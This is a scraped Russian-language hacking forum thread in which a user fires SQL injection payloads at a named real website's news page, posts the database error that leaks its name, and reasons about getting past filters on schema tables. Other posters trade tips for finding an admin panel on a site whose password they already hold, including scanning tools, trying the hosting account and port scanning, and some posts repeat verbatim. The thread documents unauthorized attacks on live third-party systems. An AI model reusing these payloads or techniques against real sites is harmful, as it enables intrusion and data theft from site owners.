http://www.looplifter.co.uk/news.asp?id=5 and '1'=(select 1)
=> так же как и при id=5
http://www.looplifter.co.uk/news.asp?id=5 and '1'=(select 2)
=> пусто
2.
http://www.looplifter.co.uk/news.asp?id=5 and 0<(select db_name())--
=>
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Looplifter' to a column of data type int.
/news.asp, line 355
==> не такая уж и слепая
http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns)-- => так же как и при id=5
http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.tables)-- => пусто
http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns) and '0'<(select count(*) from information_schema.tables)--
=> пусто
http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns) and '0'<(select 'count(*) from information_schema.tables')--
=> так же как и при id=5
==> наврятли там какой-то уж очень интеллектуальный фильтр, может просто запрещены права юзеру Looplifter на чтение information_schema.tables ?
Последний раз редактировалось DrakonHaSh; 28.04.2010 в 20:55..
народ есть ли альтернативный способ как найти админку?
уже не первый раз сталкиваюсь с такой проблемой,пароль есть- а админку не найти ..
программой делаю перебор стандартных админок типа admin,administrator,cms,admin_panel etc...
результатов нет!
2Konqi
http://madnet.name/tools/madss/
или юзай прогу IntelliTamper
и еще попробуй пароль к хостеру если нету админки все таки...
+проскань порты
например панелька http://188.40.XX.XX:2222/
народ есть ли альтернативный способ как найти админку?
уже не первый раз сталкиваюсь с такой проблемой,пароль есть- а админку не найти ..
программой делаю перебор стандартных админок типа admin,administrator,cms,admin_panel etc...
результатов нет!
2Konqi
http://madnet.name/tools/madss/
или юзай прогу IntelliTamper
и еще попробуй пароль к хостеру если нету админки все таки...
+проскань порты
например панелька http://188.40.XX.XX:2222/
народ есть ли альтернативный способ как найти админку?
уже не первый раз сталкиваюсь с такой проблемой,пароль есть- а админку не найти ..
программой делаю перебор стандартных админок типа admin,administrator,cms,admin_panel etc...
результатов нет!
есть ли другой способ ?
http://forum.xakep.ru/m_1653053/tm.htm
Последний раз редактировалось Strilo4ka; 29.04.2010 в 18:36..
И еще раз возвращаясь к теме вывода данных в SQL-inj в ошибках.
Правильно понимаю, что максимум можно вывести 64 символа чистых данных(единица в конце отбрасывается), и единственный выход - резать на подстроки?